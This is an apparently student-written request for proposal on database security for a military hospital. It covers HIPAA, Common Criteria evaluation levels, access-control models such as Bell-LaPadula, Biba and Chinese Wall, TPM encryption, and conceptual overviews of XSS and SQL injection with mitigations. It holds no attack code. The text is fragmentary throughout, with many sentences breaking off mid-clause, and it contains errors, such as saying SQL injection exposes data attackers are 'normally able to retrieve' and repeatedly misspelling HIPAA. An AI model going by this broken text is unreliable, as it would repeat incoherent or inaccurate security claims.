Professional Documents
Culture Documents
Request For Proposal
Request For Proposal
Francis Quarshie
29/03/2021
DATABASE SECURITY REQUEST FOR PROPOSAL (RFP) 2
OVERVIEW
Crest Military hospital (CMH) located in Virginia is recognized throughout the health
healthcare services to the Military, Federal agencies, corporate agencies and the general public.
Crest Military hospital have consultants in every medical and clinical field with its core values
Military hospital is segregated into an organizational structure with each structure playing a
significant role in operation of the healthcare facility. The organizational structures are namely,
service and the supporting services. The board of directors and the administration consist of the
Chief executive officer (CEO), Vice President, Executive Assistant and heads of departments.
The board of directors and the administration superintend the budgeting and financing of the
healthcare facility, the formation of facility policies and procedures and public relation. The
information services are in charge of all the facility admissions, taking patient information,
billing, keeping of medical records, information systems, human resources. The information
services are responsible for the documentation and the processing information of the patient that
visits the healthcare facility. The therapeutic services offer respiratory therapy, medical
psychology, physical therapy, nursing and dispensary. The therapeutic services provide treatment
for patient that visit Crest Military hospital. Diagnostic services consisting of the medical
laboratory and medical imaging establish the cause of sickness. Support services consisting of
central supply, housekeeping and preservation correspondingly deliver support for the whole
facility.
DATABASE SECURITY REQUEST FOR PROPOSAL (RFP) 3
Data is the lifeline of every organization therefore it is only prudent to ensure the safety
of data and prevent it from ending up in wrong hands. The information department of Crest
military hospital is in custody of client information’s such as Names, date of birth, social security
medical record numbers, admission dates, discharge dates and signatures. These information are
regarded as sensitive therefor the loss of any of the above can be devastating to the healthcare
facility, hence the need to ensure the confidentiality, integrity and security of these information.
management system to enhance its efficient healthcare delivery. The database management
system is required for handling information based on the large number of crest military hospitals
large number of patients, doctors and staff. As a result of this data processing becomes
imperative. Delicate patient health information will be stored on the database system mandatory
to conform with the Health Insurance Portability and Accountability Act (HIPPA). The Health
Insurance Portability Accountability Act (HIPPA) is a federal law that required the national
standard to protect sensitive patient health information from being disclosed deprived of the
patient’s consensus or knowledge. Information’s such as prescriptions for patients, last visit,
evaluation and diagnosis of patients should be accessible. The health facility administration must
be able to access the statistics about the health facility such as the number of patients and the
number of staff. Patient can book appointment online and at the same time access their lab
intended to safeguard the database management system. Protecting data against unlawful,
unintentional and unauthorized access is paramount to this database. Database security concepts
The RFP necessitates a regulation to develop a prerequisite for the database and security,
there is the need to match international standards. The purpose of this is to guarantee the
reliability and efficiency of the database. The RFP will implement the Common Criteria (CC)
international standard developed by the United States, Canada, France, Germany, the
Netherlands and the United Kingdom. The common criteria for Information Technology Security
Evaluation are a framework or set of principles to analyze the security of a computer systems,
(US-CERT, 2013). Common Criteria security evaluation is obligatory and must be complied with
Common Criteria benchmarks to guarantee the credentials are acknowledged globally. CC will
be used to assess the safety and fresh relation database management system (RDBMS), this
analysis will establish the potency of the of the RDBMS as to it withstanding confidentiality,
integrity and accessibility of protected health information regulatory by the HIPPA. Evaluation
assurance levels (EALs) are the levels of functional and assurance requirement defined under the
Common Criteria, the seven EALs are EAL1 functionally tested, EAL2 structurally tested, EAL3
Methodically tested and checked, EAL4 methodically designed, tested and reviewed, EAL5 semi
formally designed and tested, EAL6 semi formally verified designed and tested, EAL7 formally
verified designed and tested. The higher level EALs are stronger and more used for high risk and
proactive plan to avoid and mitigate hazards linked with a disruption of operation. It details steps
to be taken afore, during and after an event to sustain the financially viable of the institution.
When business is interrupted it can cost money, loss of revenue, plus extra expenses meaning
there is going to be loss of profit. Planning precarious functions and infrastructure with several
Defense Models
Defense models that apply to the database management systems are defense-in-depth,
process in which series of security mechanisms and controls are thoughtfully layered throughout
a computer network to protect the confidentiality, integrity and availability of the network and
the data within. Some of these defense-in-depth principles are strong passwords which are
critical multifactor authentication for any account of value using a phrase with multiple sub-
networks developed around business needs. Firewalls which also control the network traffic
through access or deny rules such as black or whitelisting IP addresses, MAC addresses and
ports. Intrusion prevention or detection systems (IPS/IDS) detects malicious network traffic by
entities on a need-to-know basis to perform or ruin certain tasks. The basis of this defense model
is that fewer people know the details of a mission or task and the likelihood or risk that
information will be compromised or fall into the hands of the opposition is decreased.
DATABASE SECURITY REQUEST FOR PROPOSAL (RFP) 6
Accountability ensures that all actions conducted by the user account cannot be disputed
as to which account executed those actions. Every user activity is monitored. Least privilege
provides additional controls within a specific document. It only provides the user minimum
levels of access or permissions needed to perform his or her job functions. These models are not
limited to human access but can be extended to applications, systems or connected devices that
Enclave computing segments the internal network to make one of those sections secure
(Northcutt, 2016). The purpose is to limit internal access to a portion of the network. The use of
internal firewalls and VPNs will add security to the data between departments in the Crest
Military Hospital and help identify where an attack happens while the VPNs will be used to
enforce standing policies. The internal firewalls will be placed between departments in the Crest
Military Hospital to monitor and control incoming and outgoing network traffic based on
predetermined rules. This would help add security to the data and identify areas of attack. In
addition, Virtual Private Networks (VPNs) will be used to administer privacy, anonymity and
security to users by allowing only authorized hosts to connect to other hosts. Since the database
would store a significant amount of personally identifiable information and protected health
execution.
The main database environment has to do with the hardware, network, applications and
electronic media used to update the database. The security of the database would be ensured
through the security mechanisms mentioned above. Data security policy within the IT
department would be changed and updated on a needed basis from time to time. These policies
would be enforced by the software which then interacts with the end user. The IT department in
DATABASE SECURITY REQUEST FOR PROPOSAL (RFP) 7
the hospital is where the database exists, and the IT technicians are the main ones responsible for
updating and maintaining the database. All employees are required to double authenticate and
create strong passwords that expire every 30 days and also go through data security training and
Health Insurance Portability and Accountability Act of 1996 (HIPAA) training during their first
week of employment.
The entire database system should ensure all patients data are confidential at all times.
Information from patients, doctors, nurses, medical staff and pharmacist must be often updated.
The flexibility of the database would allow patients and other users view, modify and update the
database. All the updates will run on a secure network with all data being encrypted. Through the
integrating access across multiple various systems, communication and information flow will be
enhanced. The architecture of the system needs to fall in with current OS and other systems used
in the Crest Military Hospital. Integrating the system will also save time and money and allow
systems communicating, identify schedules, inventories, staff functions and resume availability
(Arredondo, 2014). System integration requires scalability and flexibility, so it puts less strain on
the system in order to ensure top performance and a high level of reliability, also, certified cloud
and on-premises integrations, real time data availability and monitoring, common authentication
across all platforms and the mastering user access index which will prevent having several files
All users would undergo training on data theft, data extrusion, data exportation, data
leakage, social engineering, phishing techniques used by hackers because data can be stolen by
DATABASE SECURITY REQUEST FOR PROPOSAL (RFP) 8
malicious hackers or even by employees. Also, all removable devices used by employees must be
approved by the IT department. Additionally, social engineering or phishing attacks are data
exfiltration tactics used to manipulate and trick someone into opening a malicious script which
can then infect the entire hospitals network. E-mails that contain malware scripts will be
designed to look like it had been sent from a high-ranking hospital executive which can impact a
number of users. To curb this, the database needs to be able to reject any software downloads or
Operating systems (OSs) are prone to several threats including viruses, malware,
spoofing and denial of service. The three main aspects of OS security are confidentiality or
denial (Heiser, 2008) Hardware components and software referenced in the proposed system
shall be employed throughout the product presentation. These resources shall provide for the
security of all data in the Crest Military Hospital’s database systems through encryption and shall
only be accessed by authorized personnel. This concept, the trusting computing refers to
technologies and proposals for resolving computer security problems through hardware
manufacturers and software vendors while trusted computing base (TSB) refers to all computer
system’s hardware, firmware and software components that combine to provide the system with
a secure environment.
through hardware enhancements and associated software modifications (Rouse, 2007). This shall
DATABASE SECURITY REQUEST FOR PROPOSAL (RFP) 9
include the following: memory curtaining which would prevent programs from inappropriately
reading from or writing to each other’s memory. Securing inputs/output (I/O) that is addresses
threats from spyware such as keyloggers and programs that capture the contents of a display.
Sealed storage which allows computers to secure store encryption keys and other critical data
and remote attestation that detects unauthorized to software by generating encrypted certificates
for all applications on a PC. In order to be effective, these measures must be supported by
advances and refinements in the software and operating systems (OSs) that the PCs use.
Concerning operating system security, there are some requirements for vendors. These
protections rings protect data and functionality from faults and malicious behavior through these
series of concentric rings, with the innermost ring, 0, being the kernel. Ring 1 is the other OS
components which maintain programs that work with the ports of the computer I/O, ring 2
contains drivers and protocols while ring 3 consists of user-level programs and applications
(Stewart, et al., 2015, p. 320.). We require that database management software to include drivers
and protocols which should not be allowed to access the kernel or other OS components directly
without going through the reference monitor. Not meeting this requirement could create an
insecure environment. In order to provide the level of security necessary, a trusted platform
module (TPM) would be incorporated. A trusted platform module is a crypto processor chip used
to provide hardware based cryptographic keys for hard drive encryption. Not only is this
regarded as more secure, but because of the hardware backed keys, if the hardware is encrypted,
the only way to decrypt it is to be connected to the same system with the same TPM (Stewart, et
al., 2015, p. 303-304). Therefore, our vendors are required to use protected and trusted
computing base, which includes implementing trusted platform modules, with whole-disk
encryption where the user would be required to input a password or USB token to authenticate.
DATABASE SECURITY REQUEST FOR PROPOSAL (RFP) 10
implemented for a database based on concepts of separation and controlled information flow.
These concepts are implemented by separation mechanisms which supports both untrusted and
trustworthy components ensuring a total security solution which is tamperproof. The three cyber
security models being considered are the Biba Integrity Model, Bell-LaPadula Model and the
Chinese Wall Model. Elaboration on each of these models are as follows; Bell-LaPadula Model
focuses on data confidentiality and controlled access to classified information. The fundamental
modes of access are read only, write only or read and write and this is a simple security model.
The users in one level are not allowed access to information above their permission level.
Additionally, this method of management assumes that all data assigned with a classification and
will never change. This security model is the chosen system of the Crest Military Hospital
because the database has high classification markings and is built on the concept of a state
machine with a set of allowable states in the computer system. This database being developed
must meet the requirement such as the presence of safety features, kernel separation and
middleware services. Based on the presence of safety features, there should not be application
errors which might result in data breach and also the application should allow for concurrent
usage of the application. The kernel separation isolates data to make sure a partition cannot
access resources in other partitions, also periods processing to make sure there is time
partitioning in the database system to be developed. The middleware services MILS requirement
states that there must be a well-set message routing router to ensure data security.
DATABASE SECURITY REQUEST FOR PROPOSAL (RFP) 11
Biba Integrity Model is a set of access control rules designed to ensure data integrity
through the system. It also ensures that there are no unauthorized users making modifications to
data or programs. It uses subjects and objects with a “no write up” and “no read down” policy
which ensures the maintenance of internal and external consistency of data and programs. A
scenario in this case is the hospitals’ the board of directors passing along directions (data) to the
clinical services, practice director and financial department and then to the manager down to the
nurses, medical assistants, front desk receptionists and care coordinators since that would
preserve the integrity of the board of directors’ orders/data and the hierarchy of levels. The
developer must ensure that the system meets the Biba model objectives.
Chinese Wall Model also known as the Brewer and Nash security model concentrates on
confidentiality and implements dynamically changing access approvals. For this system to be
developed, it must meet and achieve these model objectives at every level; at the lowest level
information should be stored as objects and also at the intermediate level group of related
business by data set. Finally at the lowest level group business by conflict-of-interest class. In
each of the level there must be accessibility set and conflict resolutions for the write and read
The system being developed must not allow the quality, confidentiality and integrity of
the data to be harmed or even cause complete destruction. Protecting data is only getting tougher
as attackers have become more sophisticated with their attacks; with some of them being hard to
distinguish from a normal users’ request. The security software being installed should have the
function of identifying the host against predetermined characteristics while the network access
DATABASE SECURITY REQUEST FOR PROPOSAL (RFP) 12
control software should be able to determine if the host has the latest OS patch and employs
antivirus security software with the latest updates. In an increasingly insecure world of data
Access control, there are hundreds of employees working here at the Crest Military
Hospital and there’s a need to put technical safeguards that require access control to allow only
the authorized to access electronically protected health data. These controls include unique user
IDs, access card readers, emergency access procedure, automatic log off, auditing and reports to
track employee access to restricted business locations, proprietary areas, encryption and
decryption. This system minimizes risk by limiting the amount of information an employee has
to access and it is controlled by the system administrator in the IT department. The motive for
these precautions put in place is to reduce the threat of hackers, unauthorized person or persons
gaining access to administrative, client and patients records to cause harm which can be
damaging to our patents and the reputation of our hospital. The mandatory access control (MAC)
model is the chosen model by the hospital, as it grants users access based on an information
clearance, this policy accesses rights based on regulations from a central authority.
Authentication, all workers here at Crest Military Hospital are issued common access
cards (CACs) for identification and access purposes. These CACs are smart cards that verify a
cardholder’s identity prior to allowing access to protected resources. These CACs carry
employee’s information such as their names, social security number, employee ID, digital
certificates, biometric data, digital signature and encryption certificates. To gain access the card
must be inserted into the workstation and the employees must type in a password. All that is
needed in the database system is for it to be able to support CAC and Active Identity devices.
DATABASE SECURITY REQUEST FOR PROPOSAL (RFP) 13
Direct object access, all files in the system are encrypted and cannot be accessed directly. All the
information or data on the database are labelled according to its corresponding security level.
The system is designed with high security to log access each time a direct object reference is
made from an untrusted source. Hackers can easily predict file names and their locations once
they have a sample and so all URLs generated must be masked by the Globally Unique Identifier
Workflow applications must be well equipped to curb errors and information leakage
correctly. If there is an exposure of sensitive information, it could lead to the network being
attacked. Cyber attackers take advantage of error messages as they as they use it to leak private-
related information. The web application error handling is not often strong enough to survive a
penetration test. An attacker can be able to exploit and access unauthorized functionality or
worse create, modify or destroy data that has failed in an unknown state. Insecure data handling
can lead to separation of data quality and data integrity which leads to data loss. The main threat
to data confidentiality of the website is insecure indexing. The indexing website exposes files
which are not to be accessible by the public and also leaks information about the existence of
such files and their content. In this process the leaked information is being stored and can be
retrieved by a determined attacker. The attacker does not thwart the search engine, and this
Cross-site scripting (XSS) is a client-side code injection attack on trusted websites. The
attacker executes malicious scripts in the web browser of the victim by including malicious code
in a web page or web application. For example, a victim using a web application (e.g., e-mail or
DATABASE SECURITY REQUEST FOR PROPOSAL (RFP) 14
an e-commerce site) is logged in and if a malicious code is present while he/she is logged in, that
code sends the session information to the attacker’s email account. This helps the attacker tap
into the user’s session and also log in while the victim still uses the application. So basically, the
web page or web application becomes a vehicle to deliver malicious scripts to the user’s browser.
To keep yourself safe from XSS, you must sanitize your input. Your application code should
never output data received as input directly to the browser without checking it for malicious
code. Everyone involved in building the web application must be aware of the risks associated
with XSS vulnerabilities. All other user input should not be trusted and input from authenticated
internal users should be treated the same way public input are treated. Also, an appropriate
encoding technique must be used along with sanitizing HTML because this would allow the user
input to escape or encode it because it would break valid tags. In addition, to mitigate the
consequences of a possible XSS vulnerability, a content security policy (CSP) must be used
because it lets you declare the dynamic resources that are allowed to load depending on the
request source.
There are also SQL injection attacks which allows an attacker to interfere with the queries that
an application makes to its database. It generally allows an attacker to view data that they are
normally able to retrieve, and this might include data belonging to other users or any other data
the application is able to access. Also, in many cases, the attacker can delete or modify this data,
causing persistent damage to the applications content or behavior. A successful attack can result
in unauthorized access to sensitive data, such as passwords, credit card details or personal user
information. Many high-profile data breaches have been a result of SQL injection attacks leading
to reputational damage and regulatory fines. To help prevent these attacks; avoid placing user
provided input directly into SQL statements, also encrypt private or confidential data being
DATABASE SECURITY REQUEST FOR PROPOSAL (RFP) 15
stored in the database. Data permissions and privileges must be limited alongside avoiding the
Insecure configuration management deals with when a configuration is just plain wrong,
either from the start or after changes has been made that compromise the security of the
application or system. This makes guessing passwords, bypassing login pages and finding well-
known setup vulnerabilities a breeze. This faulty configuration can then end up getting used
everywhere in the company and thus these are some ways of preventing insecure configuration;
by limiting access to administrator interfaces; by disabling the use of default accounts and
passwords; by regularly patching and updating software to help protect public applications and
systems from malware and last but not the least using automation to your advantage through
regularly running scans and performing audits to find things like missing patches,
Basically, authentication is an approved list of users and a list of what they are allowed to
have access to. Many people gain access to systems via a password or token ID. Authentication
and session management involves verifying a user credentials and managing their active
vulnerabilities that attackers exploit to impersonate legitimate users online. Attackers use either
avenue to masquerade as a user, hijacked session IDs or stolen login credentials. For instance, it
takes just one stolen permission to infiltrate and damage your company’s viability (OWASP,
2017). These broken authentication attacks are also highly preventable through these
precautionary measures; the control of session length by tailoring the session length to the type
of user and the application being used. Rotate and invalidated session IDs allows users to be
DATABASE SECURITY REQUEST FOR PROPOSAL (RFP) 16
issued with a new session ID after login. Password policies like multi-factor authentication
Conclusion
The proposal demonstrated a new medical healthcare database management system. The
upgrade and installation of a new hardware and software would help keep the system up to date
with defense requirements and security measures that can detect intrusion and possible attacks.
Through agreement the operating system and database software are expected to be supplied
through encrypted methods only and will only be accessible by authorized employees and staff.
The test plan and remediation results show that this is a necessity or else insecure data handling
can lead to loss of data, loss of data integrity and can lead to complete loss. For these reasons, a
Reference
Arredondo, R. (2014, June 20). Making the Case for Healthcare Enterprise Integration-Sierra-
cedar.com/2014/04/04/making-the-case-for-healthcare-enterprise-integration.
Biba, K. (1975). Integrity consideration for secure computing systems. MTR-3153. Retrieved
Brewer, D. F. & Nash, M. J. (2013). The Chinese wall security policy. Gamma Secure Systems
Mead, N. (2013). US-Cert. The Common Criteria. Retrieved March 29, 2021, from
https://www.us-cert.gov/bsi/articles/best-practices-engineering/the-common-criteria
https://digitalguardian.com/blog/what-data-exfiltration
https://www.owasp.org/index.php/Error_Handling
United States Computer Emergency Readiness Team (US-CERT). (2013). The Common criteria.
https://www.us-cert.gov/bsi/articles/best-practices/requirement-engineering/the-common-
criteria
DATABASE SECURITY REQUEST FOR PROPOSAL (RFP) 18